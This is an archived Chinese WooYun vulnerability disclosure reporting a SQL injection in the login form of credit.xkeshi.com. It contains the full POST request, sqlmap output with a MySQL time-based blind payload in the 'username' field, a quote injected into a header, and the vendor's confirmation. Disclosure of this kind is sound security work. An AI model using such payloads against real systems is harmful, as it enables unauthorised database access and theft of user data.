乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-04: 细节已通知厂商并且等待厂商处理中 2015-06-05: 厂商已经确认,细节仅向厂商公开 2015-06-15: 细节向核心白帽子及相关领域专家公开 2015-06-25: 细节向普通白帽子公开 2015-07-05: 细节向实习白帽子公开 2015-07-20: 细节向公众公开
【HD】 以团队之名 以个人之荣耀 共建网络安全
注入点二:http://credit.xkeshi.com/user/login;jsessionid=1wwfhwvdrff50v32yk1wdjd3b参数 username 未过滤 导致了本次注入POST数据包:
POST /user/login HTTP/1.1Host: credit.xkeshi.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://credit.xkeshi.com/user/login;jsessionid=1wwfhwvdrff50v32yk1wdjd3bCookie: Hm_lvt_e31fc7871d44b542d1441f0ac128e773=1433342223; Hm_lpvt_e31fc7871d44b542d1441f0ac128e773=1433342271; JSESSIONID=1uqib0bochj2tyz9aatxw7w17; Hm_lvt_0ebd3318f96e1f5b8259fc3cdc476d5a=1433342237; Hm_lpvt_0ebd3318f96e1f5b8259fc3cdc476d5a=1433342867X-Forwarded-For: 8.8.8.8'Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 32username=admin&password=admin
POST parameter 'username' is vulnerable. Do you want to keep testing the others(if any)? [y/N] nsqlmap identified the following injection points with a total of 113 HTTP(s) requests:---Parameter: username (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: username=admin') AND (SELECT * FROM (SELECT(SLEEP(5)))zgPQ) AND ('lDWM'='lDWM&password=admin---[22:55:02] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0.12[22:55:02] [INFO] fetching database names[22:55:02] [INFO] fetching number of databases[22:55:02] [INFO] retrieved:[22:55:02] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y1[22:55:21] [INFO] adjusting time delay to 1 second due to good response times7[22:55:22] [INFO] retrieved: information_
因为断网跟时间的关系 数据库就没继续跑了 但是跟上一个漏洞的数据库是一样的 都是17个数据库 所以····你懂得( WooYun: 浙江爱客仕某站SQL注入 )
话说 厂商会送小礼物不?
危害等级:高
漏洞Rank:10
确认时间:2015-06-05 16:29
感谢关注,已安排人员做修复处理。
暂无